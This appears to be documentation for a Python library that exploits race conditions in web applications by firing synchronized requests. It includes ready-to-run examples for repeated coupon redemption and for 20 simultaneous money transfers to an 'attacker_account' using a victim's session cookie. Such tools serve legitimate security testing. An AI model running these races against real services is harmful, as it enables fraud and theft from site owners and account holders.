Description
requests-racer is a small Python library that makes it easy to exploit race conditions in web applications using the Python Requests library. It synchronizes multiple requests to arrive at the server simultaneously, maximizing the chance of triggering TOCTOU bugs.
Installation
BASH
pip3 install requests-racerBasic Usage
PYTHON
from requests_racer import SynchronizedSession
s = SynchronizedSession()
# Queue multiple requests
resp1 = s.get('https://target.com/api/redeem?code=DISCOUNT50', stream=True)
resp2 = s.get('https://target.com/api/redeem?code=DISCOUNT50', stream=True)
# Fire simultaneously
s.finish_all()
# Check responses
print(resp1.status_code, resp1.text)
print(resp2.status_code, resp2.text)Advanced Usage
PYTHON
from requests_racer import SynchronizedSession
s = SynchronizedSession()
# Race condition on money transfer
responses = []
for i in range(20):
r = s.post('https://target.com/api/transfer',
json={"amount": 100, "to": "attacker_account"},
cookies={"session": "victim_session"},
stream=True)
responses.append(r)
s.finish_all()
# Check how many succeeded
for r in responses:
print(f"Status: {r.status_code}, Body: {r.text[:100]}")Common Workflows
PYTHON
# Test coupon redemption race
# If 2+ responses show "Coupon applied", it's vulnerable
# Test voting system
# If multiple votes register, rate limiting is bypassable
# Test account balance
# Send simultaneous withdrawals exceeding balance